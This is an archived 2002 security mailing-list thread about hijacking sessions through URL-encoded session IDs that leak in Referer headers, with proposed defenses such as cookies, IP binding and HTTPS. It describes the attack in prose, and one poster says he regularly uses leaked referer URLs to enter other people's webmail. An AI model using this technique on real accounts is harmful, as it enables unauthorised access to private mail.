WebApp Sec mailing list archives
Re: Hijacking URL Encoded Session IDs using Referer Logs
From: zeno <bugtraq () cgisecurity net>
Date: Mon, 25 Nov 2002 10:50:41 -0500 (EST)
Many (most?) application servers use URL encoded session IDs when the user has disabled cookies. Many users disable cookies as a security precaution. There should be an advisory on this so that application
A big problem is people hear the buzzword cookie and security and think every website can steal every cookie from every site they ever visited. This isn't true unless they exploit some browser flaw. The only risk a cookie has is if it is stolen (*usually* through xss attacks) Obviously some people will disable cookies. A *better* approach(if no cookies are used) would be to tie the session (if in url) to the users ip address. This way if userb enters in this url they can't do anything (unless they share a proxy so this isn't always safe). Always lots of factors.
server vendors stop allowing URL encoded session IDs by default. If you can post an interesting link to a site, you can hijack the sessions of users with cookies disabled, and no one would be the wiser.
Another reason why a cookie is better to use.
Does hotmail or yahoo use URL session IDs? E-mail someone a link to your site and hijack their e-mail account. In the scope of this attack, they'd have no way to tell that you stole it.
Yes I see this maybe once a month or two for people using smaller free webmail companies I simply enter in the referer and boom get in there mailbox. - zeno
Also a good reason to use HTTPS. Bob On Monday, November 25, 2002, at 07:48 AM, zeno wrote:Not to my knowledge. I guess the question would be why would you store the session id in a users url? I suppose people who are to lazy to learn about cookies and don't mind having the ID logged on the server side. Not to mention its *possible* that this id can be saved by a webspider and archived. If using cookies to store these id's you won't have to worry about this problem. (unless there is a new super spider which logs cookies that I am unaware of in production use?) - zenoIs there anything on CERT about the fact that URL encoded session IDs get passed to referenced sites in the HTTP referer header? Thanks, Bob
Current thread:
- Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 24)
- Re: Hijacking URL Encoded Session IDs using Referer Logs zeno (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Jeff Dafoe (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Jeff Dafoe (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Bob Lee (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs zeno (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs zeno (Nov 25)
- <Possible follow-ups>
- Re: Hijacking URL Encoded Session IDs using Referer Logs ONEILL David J (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs Craig_Sullivan (Nov 25)
- Re: Hijacking URL Encoded Session IDs using Referer Logs UDP 53 (Dec 05)